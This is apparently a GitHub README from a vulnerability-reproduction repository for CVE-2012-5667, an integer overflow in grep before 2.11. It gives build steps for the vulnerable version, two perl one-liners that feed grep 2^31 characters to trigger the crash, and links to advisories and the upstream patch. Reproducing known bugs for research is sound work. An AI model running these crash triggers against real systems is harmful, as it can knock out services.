Skip to content
Branch: master
Find file History
Pull request Compare This branch is 1 commit ahead, 3 commits behind mudongliang:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md

README.md

CVE-2012-5667

Experiment Environment

CentOS 6.5

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2012-5667/grep-2.11.tar.xz
tar -xvf grep-2.11.tar.xz
cd grep-2.11
./configure
make

Problems in Installation & Configuration

How to trigger vulnerability

Method 1

perl -e 'print "x"x(2**31)' | ./grep x > /dev/null

Method 2

perl -e 'print "\nx"x(2**31)' | ./grep -c x > /dev/null

PoCs

Grep < 2.11 - Integer Overflow Crash (PoC)

Bug 448246 (CVE-2012-5667) - <sys-apps/grep-2.12: Arbitrary command execution (CVE-2012-5667)

grep <2.11 is vulnerable to "Arbitrary command execution"

grep CVE-2012-5667 Remote Integer Overflow Vulnerability

Vulnerability Details & Patch

Root Cause

Stack Trace

Patch

Details are in http://git.savannah.gnu.org/cgit/grep.git/commit/?id=cbbc1a45b9f843c811905c97c90a5d31f8e6c189

References

You can’t perform that action at this time.